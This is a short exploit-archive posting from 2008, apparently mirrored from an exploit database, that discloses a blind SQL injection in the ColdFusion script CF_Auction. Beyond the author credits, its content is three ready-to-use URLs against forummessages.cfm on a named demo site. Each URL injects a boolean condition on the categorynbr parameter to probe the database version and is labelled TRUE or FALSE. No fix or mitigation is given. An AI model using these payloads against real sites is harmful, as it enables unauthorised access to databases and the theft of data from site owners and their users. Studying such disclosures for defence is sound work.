[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : CF_Auction (forummessage) Blind SQL Injection Vulnerability
# Published : 2008-12-10
# Author : AlpHaNiX
# Previous Title : CF_Calendar (calendarevent.cfm) Remote SQL Injection Exploit
# Next Title : CFMBLOG (index.cfm categorynbr) Blind SQL Injection Vulnerability
###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################
#Found By : AlpHaNiX
#website : www.offensivetrack.org
#contact : AlpHa[AT]HACKER[DOT]BZ
###########################################################################
#script : CF_AUCTION
#download : null
#Demo : http://www.cfwebsite.com/
###########################################################################
#Exploits :
--=[BLIND SQL INJECTION]=--
http://www.cfwebsite.com/forummessages.cfm?topicnbr=4&categorynbr=2%20and%20substring(@@version,1,1)=5 TRUE
http://www.cfwebsite.com/forummessages.cfm?topicnbr=4&categorynbr=2%20and%20substring(@@version,1,1)=4 FALSE
http://www.cfwebsite.com/forummessages.cfm?topicnbr=4&categorynbr=2%20and%20substring(@@version,1,1)=3 FALSE
###########################################################################
# www.Syue.com [2008-12-10]